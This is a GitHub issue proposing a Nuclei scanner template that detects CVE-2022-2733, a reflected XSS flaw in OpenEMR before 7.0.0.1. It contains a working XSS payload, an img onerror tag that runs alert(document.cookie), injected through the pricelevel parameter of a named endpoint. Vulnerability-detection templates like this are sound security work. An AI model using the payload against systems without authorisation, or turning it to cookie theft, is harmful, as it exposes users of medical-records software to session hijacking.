### ISSUE TITLE
CVE-2022-2733.yaml

### ISSUE THREAD

**Issue by ctflearner** [projectdiscovery/nuclei-templates#7262]
### Template Information:

This nuclei template detects the presence of a reflected XSS vulnerability in  openemr/openemr prior to 7.0.0.1. 

Reference 
- https://nvd.nist.gov/vuln/detail/CVE-2022-2733
- https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/

### Nuclei Template:

```yaml 
id: CVE-2022-2733
info:
  name: Reflected XSS in openemr/openemr prior to 7.0.0.1.
  description: |
    This nuclei template detects the presence of a reflected XSS vulnerability in  openemr/openemr prior to 7.0.0.1.
  author: ctflearner
  severity: medium
  tags:
    - web
    - xss
    - openemr
  reference: 
       - https://nvd.nist.gov/vuln/detail/CVE-2022-2733 
       - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/
  classification: 
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-2733
     cwe-id: CWE-79
     cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
       
requests:
  - method: GET
    path:
      - "{{baseURL}}/interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=<img src=a onerror=alert(document.cookie)>"
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "alert(document.cookie)"


```
